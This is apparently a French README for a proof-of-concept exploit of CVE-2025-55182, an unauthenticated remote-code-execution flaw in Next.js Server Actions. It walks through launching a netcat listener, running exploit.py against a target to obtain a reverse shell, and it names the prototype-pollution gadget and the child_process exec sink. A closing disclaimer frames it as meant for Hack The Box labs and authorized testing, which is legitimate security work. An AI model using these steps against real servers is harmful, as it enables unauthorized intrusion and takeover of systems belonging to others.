
Je sais que vous êtes probablement ici depuis Hack the Box, si c'est le cas, oui, celui-ci fonctionne réellement.
Une preuve de concept (PoC) pour CVE-2025-55182, ciblant une vulnérabilité d'exécution de code à distance (RCE) non authentifiée dans les Server Actions de Next.js.
Cette preuve de concept exploite la pollution de prototype lors de la désérialisation de charges utiles multipart des React Server Components (RSC) afin d'injecter des commandes malveillantes dans le processus Node.js via un flux d'exécution asynchrone et non bloquant.
child_process.exec() au lieu des API bloquantes execSync() pour éviter les blocages de threads sur les nœuds conteneurisés.requests de Python.Ouvrez un terminal sur votre hôte d'attaque et lancez un socket d'écoute netcat pour capturer la connexion inverse entrante :
nc -lvnp 4444
Fournissez l'URL de base de la cible, l'adresse IP de votre interface hôte locale et le port de votre écouteur souhaité :
python3 exploit.py <target_url> <your_ip> [your_port]
python3 exploit.py http://website.whatever:port x.x.x.x 4444
Le script envoie une charge utile multipart brute et spécialement conçue directement au point de terminaison de routage de l'application avec l'en-tête de routage Next-Action requis.
En exploitant les signatures de construction d'objets via {"get":"$1:constructor:constructor"}, le moteur de désérialisation pollue l'arborescence d'objets natifs. Lors du traitement des paramètres associés, il interprète le bloc de contexte _response intégré de manière malveillante comme une file d'instructions, permettant l'exécution de code sous les privilèges du contexte utilisateur du serveur Node en cours d'exécution.
// Vecteur cible sous-jacent :
process.mainModule.require('child_process').exec('your_payload_here');
Ce script est créé strictement à des fins éducatives, pour des tests de sécurité autorisés et pour capturer des drapeaux vulnérables sur des laboratoires tels que Hack The Box. L'auteur n'est pas responsable de toute utilisation abusive, intrusion non autorisée dans les systèmes ou dommages causés par cet outil.